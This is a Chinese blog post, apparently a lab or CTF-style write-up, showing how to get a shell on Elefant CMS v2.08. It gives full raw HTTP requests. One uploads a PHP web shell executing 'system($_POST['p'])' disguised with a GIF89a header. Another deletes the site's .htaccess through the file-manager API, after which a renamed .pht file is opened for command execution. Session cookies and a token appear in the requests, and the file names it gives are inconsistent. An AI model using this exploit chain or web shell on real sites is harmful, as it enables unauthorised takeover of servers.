Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)
继CVE-2017-20063漏洞之后新漏洞,CVE-2017-20063漏洞仅支持1.3版本
漏洞出现代码:apps/filemanager/upload/drop.php
首先上传一个文件
127.0.0.1/filemanager
然后重命名为99.pht
也可以使用如下代码上传php文件测试:
此处我没有上传成功,推荐使用上面的方法:
POST /filemanager/upload/drop HTTP/1.1
Host: eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Content-Length: 498
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
content-type: multipart/form-data; boundary=------multipartformboundary1685373759841
Accept: */*
Origin: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Referer: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com/blocks/edit?id=members&return=/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1685373004; elefant_user=eqg5f048u4lou6jouog12q5es0; elefant_update_checked=1; elefant_last_page=%2Fuser
Connection: close
--------multipartformboundary1685373759841
Content-Disposition: form-data; name="path"
--------multipartformboundary1685373759841
Content-Disposition: form-data; name="token"
ed50295e5e66b7012faaea35359a60cb
--------multipartformboundary1685373759841
Content-Disposition: form-data; name="file"; filename="11a.php"
Content-Type: xxx
GIF89a
<script language="pHp">phpinfo()</script>
<?php phpinfo();?>
<?php system($_POST['p']);?>
--------multipartformboundary1685373759841--
随后使用api删除根目录下.htaccess
/filemanager/api/rm/.htaccess
具体数据包如下:
POST /filemanager/api/rm/.htaccess HTTP/1.1
Host: eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Content-Length: 511
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
content-type: multipart/form-data; boundary=------multipartformboundary1685373759841
Accept: */*
Origin: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Referer: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com/blocks/edit?id=members&return=/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1685373004; elefant_user=eqg5f048u4lou6jouog12q5es0; elefant_update_checked=1; elefant_last_page=%2Fuser
Connection: close
删除之后可以看到成功的标志:
提示删除伪静态成功:
访问刚刚修改好的pht文件/files/31.pht
即可获得shell:
THE END
0
二维码
海报
Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)
继CVE-2017-20063漏洞之后新漏洞,CVE-2017-20063漏洞仅支持1.3版本
漏洞出现代码:apps/filemanager/upload/drop.php
首先上传一个文件
127.0.0.1/filemanager
然后重命名为99.pht
也可以……
共有 0 条评论